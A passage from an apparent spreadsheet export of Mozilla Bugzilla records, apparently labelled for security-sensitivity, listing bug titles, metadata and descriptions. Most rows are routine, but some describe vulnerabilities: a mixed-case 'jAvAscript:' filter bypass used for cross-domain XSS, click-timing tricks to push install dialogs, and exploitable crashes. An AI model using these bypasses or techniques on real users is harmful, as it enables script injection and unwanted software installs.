The downloaded file is not treated as executable. 
Expected results:
Given that the result of this file is that Java is executed then this should be the same as .jar files. Granted, initially these files are always opened with restricted mode, but apparently they can be signed to bypass this. I don't think it's far fetched to imagine someone malicious is capable of signing these with rogue certs.
Also, (hate to do this) but Google Chrome treats it as dangerous.</t>
        </is>
      </c>
      <c r="X1198" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1199">
      <c r="A1199" t="n">
        <v>1494667</v>
      </c>
      <c r="B1199" t="inlineStr">
        <is>
          <t>2018-09-27 07:00:38 -0700</t>
        </is>
      </c>
      <c r="C1199" t="inlineStr">
        <is>
          <t>"selectedJob" in the URL results in 'TypeError: "newSelectedElement is undefined; can't access its "setSelected" property"'</t>
        </is>
      </c>
      <c r="D1199" t="inlineStr">
        <is>
          <t>2018-10-02 08:45:05 -0700</t>
        </is>
      </c>
      <c r="E1199" t="n">
        <v>1</v>
      </c>
      <c r="F1199" t="n">
        <v>1</v>
      </c>
      <c r="G1199" t="n">
        <v>7</v>
      </c>
      <c r="H1199" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1199" t="inlineStr">
        <is>
          <t>Tree Management</t>
        </is>
      </c>
      <c r="J1199" t="inlineStr">
        <is>
          <t>Treeherder: Frontend</t>
        </is>
      </c>
      <c r="K1199" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="L1199" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1199" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1199" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1199" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1199" t="inlineStr"/>
      <c r="Q1199" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1199" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1199" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1199" t="n">
        <v>1</v>
      </c>
      <c r="U1199" t="n">
        <v>0</v>
      </c>
      <c r="V1199" t="n">
        <v>6</v>
      </c>
      <c r="W1199" t="inlineStr">
        <is>
          <t>Visiting a page with `selectedJob=NNNN`, such as:
https://treeherder.mozilla.org/#/jobs?repo=try&amp;revision=455e34f839570cae2a2bdada66c14f0977fd64bf&amp;selectedJob=200557050
...results in the the following exception:
`TypeError: "V is undefined; can't access its "setSelected" property"`
Reproducing locally the unminified version is:
`TypeError: "newSelectedElement is undefined; can't access its "setSelected" property"`
I've rolled back production for now, so no rush :-)</t>
        </is>
      </c>
      <c r="X1199" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1200">
      <c r="A1200" t="n">
        <v>310267</v>
      </c>
      <c r="B1200" t="inlineStr">
        <is>
          <t>2005-09-27 21:48:59 -0700</t>
        </is>
      </c>
      <c r="C1200" t="inlineStr">
        <is>
          <t>crash [@ nsBidiPresUtils::Resolve] [@ nsCachedStyleData::GetStyleData]</t>
        </is>
      </c>
      <c r="D1200" t="inlineStr">
        <is>
          <t>2011-06-13 10:01:43 -0700</t>
        </is>
      </c>
      <c r="E1200" t="n">
        <v>1</v>
      </c>
      <c r="F1200" t="n">
        <v>1</v>
      </c>
      <c r="G1200" t="n">
        <v>3</v>
      </c>
      <c r="H1200" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1200" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1200" t="inlineStr">
        <is>
          <t>Layout: Text and Fonts</t>
        </is>
      </c>
      <c r="K1200" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1200" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1200" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1200" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1200" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1200" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q1200" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1200" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1200" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1200" t="n">
        <v>1</v>
      </c>
      <c r="U1200" t="n">
        <v>0</v>
      </c>
      <c r="V1200" t="n">
        <v>42</v>
      </c>
      <c r="W1200" t="inlineStr">
        <is>
          <t>Filing as security-sensitive because I believe the crash is exploitable. 
(Before I reduced the testcase, I got similar stack traces with large non-zero
numbers on top instead of zero on top.)</t>
        </is>
      </c>
      <c r="X1200" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1201">
      <c r="A1201" t="n">
        <v>1355490</v>
      </c>
      <c r="B1201" t="inlineStr">
        <is>
          <t>2017-04-11 07:26:28 -0700</t>
        </is>
      </c>
      <c r="C1201" t="inlineStr">
        <is>
          <t>Short URL link give "The token is not valid" error</t>
        </is>
      </c>
      <c r="D1201" t="inlineStr">
        <is>
          <t>2019-10-15 16:23:48 -0700</t>
        </is>
      </c>
      <c r="E1201" t="n">
        <v>1</v>
      </c>
      <c r="F1201" t="n">
        <v>1</v>
      </c>
      <c r="G1201" t="n">
        <v>7</v>
      </c>
      <c r="H1201" t="inlineStr">
        <is>
          <t>Developer Infrastructure</t>
        </is>
      </c>
      <c r="I1201" t="inlineStr">
        <is>
          <t>bugzilla.mozilla.org</t>
        </is>
      </c>
      <c r="J1201" t="inlineStr">
        <is>
          <t>Extensions</t>
        </is>
      </c>
      <c r="K1201" t="inlineStr">
        <is>
          <t>Production</t>
        </is>
      </c>
      <c r="L1201" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1201" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1201" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1201" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1201" t="inlineStr"/>
      <c r="Q1201" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1201" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1201" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1201" t="n">
        <v>1</v>
      </c>
      <c r="U1201" t="n">
        <v>0</v>
      </c>
      <c r="V1201" t="n">
        <v>12</v>
      </c>
      <c r="W1201" t="inlineStr">
        <is>
          <t>STR: 
1) Load https://mzl.la/2p3j0zu (which I shortened from bit.ly directly)
2) Click the "Short URL" link in the footer
Expected result:
A short URL appears in the text box
Actual result:
"The token is not valid. It could be because you loaded this page more than 3 days ago." appears in the search even though I just loaded the page. Doing a refresh doesn't help either.
This worked 2 weeks ago (on a similar search)</t>
        </is>
      </c>
      <c r="X1201" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1202">
      <c r="A1202" t="n">
        <v>963974</v>
      </c>
      <c r="B1202" t="inlineStr">
        <is>
          <t>2014-01-25 14:28:44 -0800</t>
        </is>
      </c>
      <c r="C1202" t="inlineStr">
        <is>
          <t>Faulty crash: use-after-free of mCurrentCompositeTask in CompositorParent::RecvFlushRendering()</t>
        </is>
      </c>
      <c r="D1202" t="inlineStr">
        <is>
          <t>2015-02-25 21:53:56 -0800</t>
        </is>
      </c>
      <c r="E1202" t="n">
        <v>1</v>
      </c>
      <c r="F1202" t="n">
        <v>1</v>
      </c>
      <c r="G1202" t="n">
        <v>3</v>
      </c>
      <c r="H1202" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1202" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1202" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K1202" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1202" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M1202" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N1202" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1202" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1202" t="inlineStr">
        <is>
          <t>[qa-][adv-main28+][adv-esr24.4+]</t>
        </is>
      </c>
      <c r="Q1202" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1202" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1202" t="inlineStr">
        <is>
          <t>mozilla30</t>
        </is>
      </c>
      <c r="T1202" t="n">
        <v>1</v>
      </c>
      <c r="U1202" t="n">
        <v>0</v>
      </c>
      <c r="V1202" t="n">
        <v>18</v>
      </c>
      <c r="W1202" t="inlineStr">
        <is>
          <t>Found by Christoph Diehl's "Faulty" fuzzer, see bug 777067</t>
        </is>
      </c>
      <c r="X1202" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1203">
      <c r="A1203" t="n">
        <v>162020</v>
      </c>
      <c r="B1203" t="inlineStr">
        <is>
          <t>2002-08-09 17:18:57 -0700</t>
        </is>
      </c>
      <c r="C1203" t="inlineStr">
        <is>
          <t>pop up XPInstall/security dialog when user is about to click</t>
        </is>
      </c>
      <c r="D1203" t="inlineStr">
        <is>
          <t>2024-10-18 01:53:07 -0700</t>
        </is>
      </c>
      <c r="E1203" t="n">
        <v>1</v>
      </c>
      <c r="F1203" t="n">
        <v>1</v>
      </c>
      <c r="G1203" t="n">
        <v>3</v>
      </c>
      <c r="H1203" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1203" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1203" t="inlineStr">
        <is>
          <t>Security</t>
        </is>
      </c>
      <c r="K1203" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1203" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1203" t="inlineStr">
        <is>
          <t>Windows 2000</t>
        </is>
      </c>
      <c r="N1203" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1203" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1203" t="inlineStr">
        <is>
          <t>[sg:fix]</t>
        </is>
      </c>
      <c r="Q1203" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1203" t="inlineStr">
        <is>
          <t>major</t>
        </is>
      </c>
      <c r="S1203" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1203" t="n">
        <v>1</v>
      </c>
      <c r="U1203" t="n">
        <v>0</v>
      </c>
      <c r="V1203" t="n">
        <v>66</v>
      </c>
      <c r="W1203" t="inlineStr">
        <is>
          <t>If I can control or predict when and where a user will click, I can get them to
install software.  That's not surprising, but it didn't seem to be in Bugzilla.
 It probably hadn't been filed because most of possible fixes suck and/or
because nobody had come up with a good exploit.
How can I control or predict when and where a user will click?
1. A game.
  1a. Make the player "pick up" items by clicking them.  Measure the speed with
which the player moves the mouse and clicks, and once the speed stabilizes, pop
up an install dialog just before the player clicks.
  1b. Force the player to click at exactly the right time: a reaction-time test,
shoot the monkey, etc.
  1c. Convince the player to double-click an object whose location I control.
  1d. Tell the player that he has infinite ammo and can shoot by pressing or
holding the 'i' button on the keyboard.  Pop up an install dialog when the
player runs out of ammo.
2. Pop-up hell.
  2a. Make the 'x' for the pop-up ad appear just where a security dialog will
appear.
  2b. Make fake pop-ups out of images so you can measure the victim's reaction
time, average mouse acceleration, etc.  Get them on the fifth "pop-up".
I will attach a demo of 1c, a game that involves double-clicking.
Possible fixes, all of which suck:
A) When a site tries to install software or calls enablePrivilege, display a
status bar message, "This page would like to install software on your computer".
 Only display the dialog after the user clicks the status bar message.  (Err,
how do you click a status bar message with the keyboard?)
B) Add a one-second delay between when the dialog gets focus and when the
Install/OK button becomes enabled.  I say "gets focus" rather than "appears"
because a site could hide an install dialog as a modal dialog of a background
window for a minute and then bring the dialog to the front at a convinient time
by closing the window in front.
C) If the total time to decide to install and download the xpi are less than
five seconds, stall installation (with the "downloading..." dialog still up)
until five seconds are up so the user has an extra chance to cancel.  I'm
worried that users might not know to cancel because they do not realize that
they accidentally clicked "install" in a dangerous dialog.
B and C both involve timers, which might be bad for accessibility
(http://www.w3.org/TR/2001/CR-UAAG10-20010912/guidelines#tech-time-independent).</t>
        </is>
      </c>
      <c r="X1203" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1204">
      <c r="A1204" t="n">
        <v>530871</v>
      </c>
      <c r="B1204" t="inlineStr">
        <is>
          <t>2009-11-24 12:17:27 -0800</t>
        </is>
      </c>
      <c r="C1204" t="inlineStr">
        <is>
          <t>Update localizations for Firefox 3.6 Beta 4</t>
        </is>
      </c>
      <c r="D1204" t="inlineStr">
        <is>
          <t>2012-08-23 00:16:07 -0700</t>
        </is>
      </c>
      <c r="E1204" t="n">
        <v>1</v>
      </c>
      <c r="F1204" t="n">
        <v>1</v>
      </c>
      <c r="G1204" t="n">
        <v>5</v>
      </c>
      <c r="H1204" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="I1204" t="inlineStr">
        <is>
          <t>www.mozilla.org</t>
        </is>
      </c>
      <c r="J1204" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1204" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1204" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1204" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1204" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1204" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1204" t="inlineStr"/>
      <c r="Q1204" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1204" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1204" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1204" t="n">
        <v>1</v>
      </c>
      <c r="U1204" t="n">
        <v>0</v>
      </c>
      <c r="V1204" t="n">
        <v>4</v>
      </c>
      <c r="W1204" t="inlineStr">
        <is>
          <t>We're doing a Beta 4, with more locales, and updates to locales.
Updates needed for shipped-locales, l10n-changesets_mozilla-1.9.2, and firefoxDetails.php.
Pascal, as webdev is in turkey-land, can you handle the website update? beltzner has the timeline, and a .planning post in the works.</t>
        </is>
      </c>
      <c r="X1204" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1205">
      <c r="A1205" t="n">
        <v>830614</v>
      </c>
      <c r="B1205" t="inlineStr">
        <is>
          <t>2013-01-14 19:51:41 -0800</t>
        </is>
      </c>
      <c r="C1205" t="inlineStr">
        <is>
          <t>Wrapping a WebIDL object should beware WrapNativeParent reentering itself</t>
        </is>
      </c>
      <c r="D1205" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E1205" t="n">
        <v>1</v>
      </c>
      <c r="F1205" t="n">
        <v>1</v>
      </c>
      <c r="G1205" t="n">
        <v>3</v>
      </c>
      <c r="H1205" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1205" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1205" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1205" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1205" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1205" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1205" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1205" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1205" t="inlineStr">
        <is>
          <t>[adv-main19+]</t>
        </is>
      </c>
      <c r="Q1205" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1205" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1205" t="inlineStr">
        <is>
          <t>mozilla21</t>
        </is>
      </c>
      <c r="T1205" t="n">
        <v>1</v>
      </c>
      <c r="U1205" t="n">
        <v>0</v>
      </c>
      <c r="V1205" t="n">
        <v>17</v>
      </c>
      <c r="W1205" t="inlineStr">
        <is>
          <t>XPCWrappedNative::GetNewOrUsed has comments like:
540     // Take the performance hit of checking the hashtable again in case
541     // the preCreate call caused the wrapper to get created through some
542     // interesting path (the DOM code tends to make this happen sometimes).
The point is that if our parent is a node, WrapNativeParent can end up running XBL constructors for it, which can try to wrap us, manage to do that, and then unwind back to the generated Wrap() with the object already wrapped.  And possibly preserved.  And then we'll go and SetWrapper() after that, clobbering bits and triggering asserts.
I think we can just get away with checking for a cached object after WrapNativeParent and returning it.  That certainly fixes my minimal testcase, at least.
The bad news is that I think we may want this on Aurora and maybe Beta.  I ran into this while working on XULElement, but I can't guarantee that we have no cases in which some WebIDL binding is parented to a node but can be wrapped before that node.
If we _can_ prove we have no such cases, great.  Then we should open this up.  ;)</t>
        </is>
      </c>
      <c r="X1205" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1206">
      <c r="A1206" t="n">
        <v>639728</v>
      </c>
      <c r="B1206" t="inlineStr">
        <is>
          <t>2011-03-07 19:32:27 -0800</t>
        </is>
      </c>
      <c r="C1206" t="inlineStr">
        <is>
          <t>Crash [@ mozilla::DOMSVGPathSegList::ItemAt] with GC</t>
        </is>
      </c>
      <c r="D1206" t="inlineStr">
        <is>
          <t>2011-07-06 10:50:24 -0700</t>
        </is>
      </c>
      <c r="E1206" t="n">
        <v>1</v>
      </c>
      <c r="F1206" t="n">
        <v>1</v>
      </c>
      <c r="G1206" t="n">
        <v>3</v>
      </c>
      <c r="H1206" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1206" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1206" t="inlineStr">
        <is>
          <t>SVG</t>
        </is>
      </c>
      <c r="K1206" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1206" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1206" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1206" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1206" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1206" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q1206" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1206" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S1206" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1206" t="n">
        <v>1</v>
      </c>
      <c r="U1206" t="n">
        <v>0</v>
      </c>
      <c r="V1206" t="n">
        <v>25</v>
      </c>
      <c r="W1206" t="inlineStr">
        <is>
          <t>Created attachment 517633
testcase (crashes Firefox when loaded) (requires extension for GC)
1. Install 'DOM Fuzz Lite' from
    https://www.squarefree.com/extensions/domFuzzLite.xpi
2. Load the testcase.
Result: crash [@ mozilla::DOMSVGPathSegList::ItemAt]
Security-sensitive because anything that involves GC scares me.</t>
        </is>
      </c>
      <c r="X1206" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1207">
      <c r="A1207" t="n">
        <v>922164</v>
      </c>
      <c r="B1207" t="inlineStr">
        <is>
          <t>2013-09-30 08:57:52 -0700</t>
        </is>
      </c>
      <c r="C1207" t="inlineStr">
        <is>
          <t>User error is not shown for tampered query string values</t>
        </is>
      </c>
      <c r="D1207" t="inlineStr">
        <is>
          <t>2013-09-30 13:03:44 -0700</t>
        </is>
      </c>
      <c r="E1207" t="n">
        <v>1</v>
      </c>
      <c r="F1207" t="n">
        <v>1</v>
      </c>
      <c r="G1207" t="n">
        <v>6</v>
      </c>
      <c r="H1207" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I1207" t="inlineStr">
        <is>
          <t>Marketplace Graveyard</t>
        </is>
      </c>
      <c r="J1207" t="inlineStr">
        <is>
          <t>Payments/Refunds</t>
        </is>
      </c>
      <c r="K1207" t="inlineStr">
        <is>
          <t>1.4</t>
        </is>
      </c>
      <c r="L1207" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1207" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N1207" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1207" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1207" t="inlineStr">
        <is>
          <t>[qa-]</t>
        </is>
      </c>
      <c r="Q1207" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1207" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1207" t="inlineStr">
        <is>
          <t>2013-10-01</t>
        </is>
      </c>
      <c r="T1207" t="n">
        <v>1</v>
      </c>
      <c r="U1207" t="n">
        <v>0</v>
      </c>
      <c r="V1207" t="n">
        <v>7</v>
      </c>
      <c r="W1207" t="inlineStr">
        <is>
          <t>Created attachment 812089
2013-09-30-10-08-22.png
When a query string is tampered with, solitude returns a 400 to webpay (bug 912027).
Expected:
User should be shown an informative error
Actual:
User is shown a blank screen
(see bug 922154 for the root cause of the error)</t>
        </is>
      </c>
      <c r="X1207" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1208">
      <c r="A1208" t="n">
        <v>704354</v>
      </c>
      <c r="B1208" t="inlineStr">
        <is>
          <t>2011-11-21 16:31:06 -0800</t>
        </is>
      </c>
      <c r="C1208" t="inlineStr">
        <is>
          <t>"DragAndDropJacking" (?) + javAscript: URL = XSS</t>
        </is>
      </c>
      <c r="D1208" t="inlineStr">
        <is>
          <t>2024-05-29 15:56:59 -0700</t>
        </is>
      </c>
      <c r="E1208" t="n">
        <v>1</v>
      </c>
      <c r="F1208" t="n">
        <v>1</v>
      </c>
      <c r="G1208" t="n">
        <v>2</v>
      </c>
      <c r="H1208" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1208" t="inlineStr">
        <is>
          <t>Firefox</t>
        </is>
      </c>
      <c r="J1208" t="inlineStr">
        <is>
          <t>Tabbed Browser</t>
        </is>
      </c>
      <c r="K1208" t="inlineStr">
        <is>
          <t>8 Branch</t>
        </is>
      </c>
      <c r="L1208" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1208" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1208" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1208" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1208" t="inlineStr">
        <is>
          <t>[sg:moderate][qa+][qa!:11][qa!:12]</t>
        </is>
      </c>
      <c r="Q1208" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1208" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1208" t="inlineStr">
        <is>
          <t>Firefox 13</t>
        </is>
      </c>
      <c r="T1208" t="n">
        <v>1</v>
      </c>
      <c r="U1208" t="n">
        <v>2</v>
      </c>
      <c r="V1208" t="n">
        <v>62</v>
      </c>
      <c r="W1208" t="inlineStr">
        <is>
          <t>Created attachment 576026
A sample HTML page to exploit the vulnerability. It can go to an Iframe.
User Agent: Mozilla/5.0 (Windows NT 6.1; rv:8.0) Gecko/20100101 Firefox/8.0
Build ID: 20111104165243
Steps to reproduce:
It is possible to do Cross Domain Self XSS by using the:
1- HTML5 Drag and Drop feature that can lead to bypassing the cross domain policy.
2- Bypassing "javascript:" protocol protection by changing the characters' cases.
i.e. dragging and dropping "javascript:alert(1)" to a new tab does not work. However, dragging and dropping "jAvAscript:alert(1)" works successfully.
Now, if you can embed your malicious IFrame in another website such as Facebook, you can conduct a Cross Site Scripting against that website.
I have created a test case for you that the victim "soroush.secproject.com" can be exploited by "www.0me.me":
http://soroush.secproject.com/downloadable/demo/FF8.0.SelfXSSHost.html
I will attach both of "FF8.0.SelfXSSHost.html" and "FF8.0.SelfXSSTarget.html" to this issue as well.
I tried to create a real example to show how dangerous it can be. All the Javascripts are harmless and will only show you document.location+document.cookie.
Actual results:
It is possible to drag and drop a javascript (for example "JaVaScripT:alert(1)") to a HTML page that use HTML5 drag and drop feature to conduct XSS attack.
Now, if you put this HTML5 page in an Iframe, the malicious script can be run on the domain that include the Iframe.
Expected results:
First of all, "javascript:" protocol should be validated properly to not be run by upper-casing the characters as an example.
The script that is being dragged and dropped, should be run under the same domain (not any other domain).</t>
        </is>
      </c>
      <c r="X1208" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1209">
      <c r="A1209" t="n">
        <v>1002415</v>
      </c>
      <c r="B1209" t="inlineStr">
        <is>
          <t>2014-04-28 03:50:17 -0700</t>
        </is>
      </c>
      <c r="C1209" t="inlineStr">
        <is>
          <t>Imip bar button type is not adjusted automatically</t>
        </is>
      </c>
      <c r="D1209" t="inlineStr">
        <is>
          <t>2014-05-05 10:35:55 -0700</t>
        </is>
      </c>
      <c r="E1209" t="n">
        <v>1</v>
      </c>
      <c r="F1209" t="n">
        <v>1</v>
      </c>
      <c r="G1209" t="n">
        <v>2</v>
      </c>
      <c r="H1209" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1209" t="inlineStr">
        <is>
          <t>Calendar</t>
        </is>
      </c>
      <c r="J1209" t="inlineStr">
        <is>
          <t>Lightning Only</t>
        </is>
      </c>
      <c r="K1209" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L1209" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M1209" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N1209" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1209" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1209" t="inlineStr"/>
      <c r="Q1209" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R1209" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1209" t="inlineStr">
        <is>
          <t>3.3</t>
        </is>
      </c>
      <c r="T1209" t="n">
        <v>1</v>
      </c>
      <c r="U1209" t="n">
        <v>0</v>
      </c>
      <c r="V1209" t="n">
        <v>9</v>
      </c>
      <c r="W1209" t="inlineStr">
        <is>
          <t>The automated type adjusting of new imipbar buttons is currently broken. There is a related error log message and I already have a fix for this. Due to a system crash it may take some days to provide it.</t>
        </is>
      </c>
      <c r="X1209" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1210">
      <c r="A1210" t="n">
        <v>725770</v>
      </c>
      <c r="B1210" t="inlineStr">
        <is>
          <t>2012-02-09 12:02:14 -0800</t>
        </is>
      </c>
      <c r="C1210" t="inlineStr">
        <is>
          <t>Firefox crashes by mozRequestFullScreen and history.back function</t>
        </is>
      </c>
      <c r="D1210" t="inlineStr">
        <is>
          <t>2024-05-29 15:57:34 -0700</t>
        </is>
      </c>
      <c r="E1210" t="n">
        <v>1</v>
      </c>
      <c r="F1210" t="n">
        <v>1</v>
      </c>
      <c r="G1210" t="n">
        <v>3</v>
      </c>
      <c r="H1210" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I1210" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J1210" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K1210" t="inlineStr">
        <is>
          <t>10 Branch</t>
        </is>
      </c>
      <c r="L1210" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M1210" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N1210" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1210" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1210" t="inlineStr">
        <is>
          <t>[sg:critical][advisory-tracking+]</t>
        </is>
      </c>
      <c r="Q1210" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1210" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1210" t="inlineStr">
        <is>
          <t>mozilla17</t>
        </is>
      </c>
      <c r="T1210" t="n">
        <v>1</v>
      </c>
      <c r="U1210" t="n">
        <v>0</v>
      </c>
      <c r="V1210" t="n">
        <v>68</v>
      </c>
      <c r="W1210" t="inlineStr">
        <is>
          <t>Created attachment 595841
mozFullScreen-Back-Crash.html
User Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.46 Safari/535.11
Steps to reproduce:
When history.length is greater than 1 (back button is enabled) and user initiate the click button:
